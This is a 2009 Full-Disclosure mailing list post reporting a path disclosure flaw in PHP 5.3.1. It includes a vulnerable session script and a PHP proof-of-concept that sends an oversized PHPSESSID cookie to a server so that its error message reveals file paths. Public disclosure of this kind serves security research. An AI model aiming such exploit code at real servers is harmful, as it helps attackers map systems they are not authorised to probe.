[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <4B36F52D.3040406@gmail.com>
Date: Sun, 27 Dec 2009 02:48:29 -0300
From: WHK <www.kernel32@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Path disclosure in PHP 5.3.1
Make a script vulnerable:
<?php
session_start();
if($_SESSION)
echo $_SESSION;
else
$_SESSION = 'xx';
?>
Now look the script in you explorer and change the value of cookie
"PHPSESSID" to 300 chars "a" and look the disclosure:
Warning: session_start() [function.session-start]:
open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php
on line 3
PoC:
<?php
error_reporting(0);
$payload =
'GET / HTTP/1.1
Host: 127.0.0.1
Connection: close
Cookie: PHPSESSID='.str_repeat('a', 500).';
';
if(!$handle = fsockopen('127.0.0.1', 80)){
die('Error');
}else{
fputs($handle, $payload);
while(!feof($handle)){
$retorno .= fread($handle, 1024);
}
echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
}
?>
if value of cookie is "aaaaaaa" then file in temp of server is
"sess_aaaaaaa", if value of cookie is ax300 dont make file and return
the error message.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists